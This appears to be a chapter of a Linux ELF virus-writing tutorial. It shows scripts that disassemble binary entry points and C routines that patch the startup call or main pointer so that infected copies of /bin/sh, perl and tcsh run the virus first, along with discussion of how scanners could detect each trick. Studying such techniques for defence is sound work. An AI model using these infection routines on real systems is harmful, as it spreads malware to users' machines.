The longest part of the journey is said to be the passing of the gate. | |
Marcus Terentius Varro |
If we decide to leave entry_point as it is, we have to patch something else. One approach is to disassemble the code, starting at entry_point, find the first call (or jmp) and abuse it. This requires way too much intelligence for a virus, though. But then we are operating in a homogeneous environment, having one compiler and one C run-time library for all. The startup code should be the same for every executable.
We uses the tool from e_entry to retrieve the entry point. On some shells a read from a pipe opens a sub-shell, i.e. it does not export the variables to the surrounding scope. The while loop is executed just once. Its only purpose is to build a block for read.
Command: pre/i386-redhat7.3-linux/entry_point/gdb_core.sh
#!/bin/sh
file=${1:-/bin/sh}
tmp/i386-redhat7.3-linux/evil_magic/e_entry ${file} \
| while read entry_point offset
do
/bin/echo "[entry_point=${entry_point}]"
/usr/bin/gdb ${file} -q <<EOT 2>&1
break *0x${entry_point}
run
set disassembly-flavor intel
disassemble
EOT
done |
Output: out/i386-redhat7.3-linux/entry_point/sh.gdb
0x8059440 <_start>: xor ebp,ebp
0x8059442 <_start+2>: pop esi
0x8059443 <_start+3>: mov ecx,esp
0x8059445 <_start+5>: and esp,0xfffffff0
0x8059448 <_start+8>: push eax
0x8059449 <_start+9>: push esp
0x805944a <_start+10>: push edx
0x805944b <_start+11>: push 0x80b1ac0
0x8059450 <_start+16>: push 0x8058ad8
0x8059455 <_start+21>: push ecx
0x8059456 <_start+22>: push esi
0x8059457 <_start+23>: push 0x8059540
0x805945c <_start+28>: call 0x8059080 <__libc_start_main> |
Of course we have to implement a check whether the code at the entry address really looks like above output. Just in case the target is already infected (by a superior virus). To implement a comparison we only need offset and size, not actual opcodes. But I will feel better after I have them straight in front of me. And ndisasm(1) starts counting with zero, which demands less brain activity.
Command: pre/i386-redhat7.3-linux/entry_point/intel.sh
#!/bin/sh
file=${1:-/bin/sh}
tmp/i386-redhat7.3-linux/evil_magic/e_entry ${file} \
| while read entry_point offset
do
/usr/bin/ndisasm -e "${offset}" -o "${entry_point}" -U "${file}" \
| /bin/sed -e "/\(ret\|hlt\)/q"
done |
Output: out/i386-redhat7.3-linux/entry_point/sh.disasm
007AFA30 31ED xor ebp,ebp
007AFA32 5E pop esi
007AFA33 89E1 mov ecx,esp
007AFA35 83E4F0 and esp,byte -0x10
007AFA38 50 push eax
007AFA39 54 push esp
007AFA3A 52 push edx
007AFA3B 68C01A0B08 push dword 0x80b1ac0
007AFA40 68D88A0508 push dword 0x8058ad8
007AFA45 51 push ecx
007AFA46 56 push esi
007AFA47 6840950508 push dword 0x8059540
007AFA4C E81FFCFFFF call 0x7af670
007AFA51 F4 hlt |
There is one remaining issue. Elf32_Ehdr::e_entry is an absolute address, as is the value popped off the stack by ret. The operand of call and jmp is encoded relative to the location of the following instruction, however. The following is taken from the documentation of nasm. [1]
CALL imm ; E8 rw/rd [8086]
[…] The codes rb, rw and rd indicate that one of the operands to the instruction is an immediate value, and that the difference between this value and the address of the end of the instruction is to be encoded as a byte, word or doubleword respectively. Where the form rw/rd appears, it indicates that either rw or rd should be used according to whether assembly is being performed in BITS 16 or BITS 32 state respectively.
Source: src/one_step_closer/e2/patch_entry_addr.inc
bool target_patch_entry_addr(Target* t)
{
unsigned char* self_entry_code = (unsigned char*)SELF->e_entry;
unsigned char* target_entry_code = t->target_entry_code;
int beyond_the_call;
int* patch_point;
TRACE(stderr, "target_patch_entry_addr\n");
CHECK_EQ(memcmp(self_entry_code, target_entry_code, 0xc), 0);
/* check for "call" */
CHECK_EQ(self_entry_code[0x1c], target_entry_code[0x1c]);
/* check for "hlt" */
CHECK_EQ(self_entry_code[0x21], target_entry_code[0x21]);
beyond_the_call = t->p.ehdr->e_entry + 0x21;
patch_point = (int*)(target_entry_code + 0x1D);
t->original_entry = beyond_the_call + *patch_point;
*patch_point = target_new_entry_addr(t) - beyond_the_call;
TRACE(stderr, "*patch_point=%08x\n", *patch_point);
return true;
} |
Output: out/i386-redhat7.3-linux/one_step_closer/e2i1/cc
Infecting copy of /bin/tcsh... wrote 26 bytes, Ok
Infecting copy of /usr/bin/perl... wrote 26 bytes, Ok
Infecting copy of /bin/mt... wrote 26 bytes, Ok
Infecting copy of /bin/sh... wrote 26 bytes, Ok
4 infected, 0 failed |
Output: out/i386-redhat7.3-linux/one_step_closer/test-e2i1
ELFtmp/i386-redhat7.3-linux/one_step_closer/e2i1/sh_infected
2.05a.0(1)-release
ELFusage: mt [-v] [--version] [-h] [ -f device ] command [ count ]
ELFtcsh 6.10.00 (Astron) 2000-11-19 (i386-intel-linux) options 8b,nls,dl,al,kan,rh,color,dspm
ELF
This is perl, v5.6.1 built for i386-linux
---
ELFGNU bash, version 2.05a.0(1)-release (i686-pc-linux-gnu)
Copyright 2001 Free Software Foundation, Inc. |
Output looks nice, but we had that already. What has increased code size and complexity gained us?
Source: pre/i386-redhat7.3-linux/entry_point/entry_point.sh
#!/bin/sh
tmp/i386-redhat7.3-linux/evil_magic/e_entry \
/bin/sh \
tmp/i386-redhat7.3-linux/one_step_closer/e1i1/sh_infected \
tmp/i386-redhat7.3-linux/one_step_closer/e2i1/sh_infected
|
Output: out/i386-redhat7.3-linux/entry_point/entry_point
8059440 70720
80c6420 517152
8059440 70720 |
OK. One vulnerability of the infection is not visible to readelf(1) anymore. But does that really help? It's still possible to write a heuristic scanner for it. All it takes is to verify the operand of call shown in the disassembly listing.
Output: out/i386-redhat7.3-linux/entry_point/e2.disasm
007AFA30 31ED xor ebp,ebp
007AFA32 5E pop esi
007AFA33 89E1 mov ecx,esp
007AFA35 83E4F0 and esp,byte -0x10
007AFA38 50 push eax
007AFA39 54 push esp
007AFA3A 52 push edx
007AFA3B 68C01A0B08 push dword 0x80b1ac0
007AFA40 68D88A0508 push dword 0x8058ad8
007AFA45 51 push ecx
007AFA46 56 push esi
007AFA47 6840950508 push dword 0x8059540
007AFA4C E8BFCF0600 call 0x81ca10
007AFA51 F4 hlt |
Original value is 0x7af670, which resolves into a shared library. The new value is local to the executable and easy to spot: 0x81ca10. So what's the point?
gdb(1) revealed us the name of the function whose call we abused: __libc_start_main. I can't help thinking that it is part of glibc, but don't be hasty.
Command: pre/i386-redhat7.3-linux/entry_point/ldd.sh
#!/bin/sh
ldd /bin/bash |
Output: out/i386-redhat7.3-linux/entry_point/ldd
libtermcap.so.2 => /lib/libtermcap.so.2 (0x40023000)
libdl.so.2 => /lib/libdl.so.2 (0x40028000)
libc.so.6 => /lib/libc.so.6 (0x4002b000)
/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000) |
Now that we have a filename we can search the function in the library.
Command: pre/i386-redhat7.3-linux/entry_point/nm.sh
#!/bin/sh
library=$(
/usr/bin/ldd /bin/sh \
| /usr/bin/perl -ane 'm/libc/ && print $F[2];'
)
/usr/bin/nm -D ${library} --line-numbers --no-sort \
| /bin/grep __libc_start_main |
Output: out/i386-redhat7.3-linux/entry_point/nm
00017034 T __libc_start_main |
First class service. We even got a line number from nm(1).
Source: src/entry_point/__libc_start_main
# /usr/src/redhat/SOURCES/glibc-2.2.4/csu/../sysdeps/generic/libc-start.c
46 int
47 /* GKM FIXME: GCC: this should get __BP_ prefix by virtue of the
48 BPs in the arglist of startup_info.main and startup_info.init. */
49 BP_SYM (__libc_start_main) (int (*main) (int, char **, char **),
50 int argc, char *__unbounded *__unbounded ubp_av,
51 void (*init) (void), void (*fini) (void),
52 void (*rtld_fini) (void), void *__unbounded stack_end)
53 { |
If you have a procedure with 10 parameters, you probably missed some (according to an old saying).
Let's see what this declaration tells about the disassembled code. For one thing, arguments are pushed in reverse order on the stack. This is the traditional way of the C. It allows easy implementation of functions like printf(3) that take an arbitrary number of arguments. Actual values for arguments: main = 0x0, init = 0x0, fini = 0x0.
The case of rtld_fini needs more documentation. [2] A comment from glibc's /usr/include/asm/elf.h:
/* SVR4/i386 ABI (pages 3-31, 3-32) says that when the program starts %edx contains a pointer to a function which might be registered using atexit. This provides a mean for the dynamic linker to call DT_FINI functions for shared libraries that have been loaded before the code runs. A value of 0 tells we have no such handler. |
Anyway, even without looking at the complete source of __libc_start_main I would guess that each of these function pointers is invoked at some time. Efforts are concentrated on main.
Source: src/one_step_closer/e3/patch_entry_addr.inc
bool target_patch_entry_addr(Target* t)
{
unsigned char* self_entry_code = (unsigned char*)SELF->e_entry;
unsigned char* target_entry_code = t->target_entry_code;
int* patch_point = (int*)(target_entry_code + 0x18);
TRACE(stderr, "target_patch_entry_addr\n");
CHECK_EQ(memcmp(self_entry_code, target_entry_code, 0xc), 0);
/* check for last "push" */
CHECK_EQ(self_entry_code[0x17], target_entry_code[0x17]);
/* check for "call" */
CHECK_EQ(self_entry_code[0x1c], target_entry_code[0x1c]);
/* check for "hlt" */
CHECK_EQ(self_entry_code[0x21], target_entry_code[0x21]);
t->original_entry = *patch_point;
TRACE(stderr, "old *patch_point=%08x\n", *patch_point);
*patch_point = target_new_entry_addr(t);
TRACE(stderr, "new *patch_point=%08x\n", *patch_point);
return true;
} |
Output: out/i386-redhat7.3-linux/one_step_closer/test-e3i1
ELFtmp/i386-redhat7.3-linux/one_step_closer/e3i1/sh_infected
2.05a.0(1)-release
ELFusage: mt [-v] [--version] [-h] [ -f device ] command [ count ]
ELFtcsh 6.10.00 (Astron) 2000-11-19 (i386-intel-linux) options 8b,nls,dl,al,kan,rh,color,dspm
ELF
This is perl, v5.6.1 built for i386-linux
---
ELFGNU bash, version 2.05a.0(1)-release (i686-pc-linux-gnu)
Copyright 2001 Free Software Foundation, Inc. |
We see the same nice output again and again. So what's different this time?
Output: out/i386-redhat7.3-linux/entry_point/e3.disasm
007AFA30 31ED xor ebp,ebp
007AFA32 5E pop esi
007AFA33 89E1 mov ecx,esp
007AFA35 83E4F0 and esp,byte -0x10
007AFA38 50 push eax
007AFA39 54 push esp
007AFA3A 52 push edx
007AFA3B 68C01A0B08 push dword 0x80b1ac0
007AFA40 68D88A0508 push dword 0x8058ad8
007AFA45 51 push ecx
007AFA46 56 push esi
007AFA47 6820640C08 push dword 0x80c6420
007AFA4C E81FFCFFFF call 0x7af670
007AFA51 F4 hlt |
The difference to the original is less obvious. Both values of main are local to the executable. But again the modified value is less than 4096 bytes from the end of the code segment.
It seems that we achieved little. But the concept of studying source code to find patch points looks promising.
[1] | Section A.2 at http://www.octium.net/oldnasm/docs/nasmdoca.html#section-A.2 and A.13 at http://www.octium.net/oldnasm/docs/nasmdoca.html#section-A.13. |
[2] |